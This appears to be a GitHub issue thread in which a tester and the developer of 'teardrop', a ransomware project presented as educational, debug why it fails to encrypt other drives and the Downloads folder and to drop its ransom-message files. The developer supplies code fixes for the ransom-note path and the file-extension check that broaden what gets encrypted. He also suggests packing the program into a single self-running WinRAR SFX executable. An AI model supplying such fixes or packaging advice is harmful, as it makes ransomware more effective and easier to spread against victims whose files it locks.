File on different Drive not encrypting | Sytem Volume Information issue

[TrevorCEH]

I have tested your latest released (teardrop-2.1.1) and today's updated repository also.
1.This was my configuration Just little change of these text.

*2.If I just copy (teardrop.exe) in my desktop and click (with/without Admin privileges) for run It doesn't run.It shows this Error.But when I copy full Debug/Release directory into desktop and click on(teardrop.exe) from folder with/without Admin privileges It runs and works perfectly.If It possible please make it in single .exe file.

**3.After successfully Encrypted all files It doesn't create any .txt or .html files in desktop.
4. But All files from Downloads/Music/Pictures/videos and All others Drives/Connected Devices remain unchanged.You can see some of my test screenshot here.

[hackthedev]

About learning new Things

Back in the day when i started programming I learned from a Ransomware Project called "Hiddentear". I learned a lot there. Thats why i wanted to make my own Ransomware project so that people might learn new things too like i did.

Part 2

Yeah the "problem" is that if you copy teardrop.exe to any other location without the .dll files it will fail. I might be able to merge this, but when this happenes I usually make an SFX WinRAR Archive. It basically lets you create a WinRAR Archive with special features like "Execute after Extraction" and it saves as runnable .exe File, so you could merge them all into one exe file.

This is at least how I dealed with it in the past.

Part 3

I know this issue where it skips paths when they encounter some error. I fixed it some time ago and it did work but it seems like now its not anymore or at least in your case. I will check that again and also investigate about why i.e. Downloads is not being encrypted.

Also it should've created those message files in the root of the drive, but I might've made an error on this line and this one too, since the first parameter needs to be a file path, but i only set the path to the drive without the filename.

How it looks like:

File.WriteAllText(drive.Name, Properties.Settings.Default.message_txt);

How it's supposed to be (untested):

File.WriteAllText(drive.Name + "\\message.html", Properties.Settings.Default.message_txt);

Links

WinRAR SFX Tutorial
("Execute after Extraction" should be covered in the Tab "Setup").

[hackthedev]

Oh @TrevorCEH and by the way in the application folder should be a file named "log.txt". you might want to post it too so i can see whats going on

[TrevorCEH]

I am sorry for late.I was in sleep.We are not in same time zone.Here is the log file.Please,check it
log.txt

[hackthedev]

Okay the reason why it didn't create any message file on the drives was also because The device is not ready. (Thats one error).

Also it didn't encrpt the other drives because the
Access to the path 'R:\' is denied. and
Access to the path 'Z:\' is denied.

Log file text:

GetFiles > Create Message File ]=================================
The device is not ready.

ShowAllFolderUnder > General Error ]=================================
The device is not ready.

GetFiles > Create Message File ]=================================
Access to the path 'R:' is denied.

ShowAllFolderUnder > General Error ]=================================
Access to the path 'R:\System Volume Information' is denied.

GetFiles > Create Message File ]=================================
Access to the path 'Z:' is denied.

ShowAllFolderUnder > General Error ]=================================
Access to the path 'Z:\System Volume Information' is denied.

Basically the program never had any permission to do anything with those drives. I don't know why this happened in your case, but i will investigate this issue. Its possible that this issue is only happening on your machine, but we are going to figure it out anyway ;-)

I will keep you updated, @TrevorCEH .

[TrevorCEH]

I have tasted the same compiled file in ( windows 8.1 64 bit -single language Build 9600) and I have seen nearly same things happen like windows 10 pro 64-bit .

1. In This machine I can right click on mouse that was not possible in windows 10 .

2. All desktop files got 100% encrypted and some files from download folder also

3. Others drive remain unchanged

4. log file may be empty or some space I have got. Here is log file

log.txt

[hackthedev]

Thank you for testing it.

It seems like its still unable to encrypt other drives. I will try finding the issue in the program and fix it tomorrow. at least thats what i plan.

When I find something new i'll gonna let you know ;-)

[hackthedev]

@TrevorCEH i might've found the issue why some files in the directory remained unchanged. If you look at this line, it checks if the file's extension is the same as one of those saved in the array, but i forgot to add the .toLower() on ext. Thats why the Images that have the PNG extension in caps were not encrypted.

Im currently updating it and i already took care of that.

Broken Line of Code:

if (validExtensions.Contains(ext))

How it should be:

if (validExtensions.Contains(ext.ToLower()))

[TrevorCEH]

I have replaced (https://github.com/hackthedev/teardrop/blob/master/teardrop/teardrop/Form1.cs#L220) this line with this line * if (validExtensions.Contains(ext.ToLower())) * and nearly same things happen.

*Note: I believe file extention is not the reason for unencrypt others drivers. I have found ( .exe) extention is not included in your code but It also encrypted.

[TrevorCEH]

Here is the log file you can check it,If you have some times
log.txt

[hackthedev]

Im not blaming the file extension to break the encryption of other hard drives but general encryption. Im still investigating the issue related to the drives not being ready therefore not being encrypted

[hackthedev]

Hello @TrevorCEH . I've updated it. Its kind of fixed. Well at least it encrypted one drive but not the other one. Its kind of buggy. I honestly dont know why this is happening.

I will still investigate on this issue.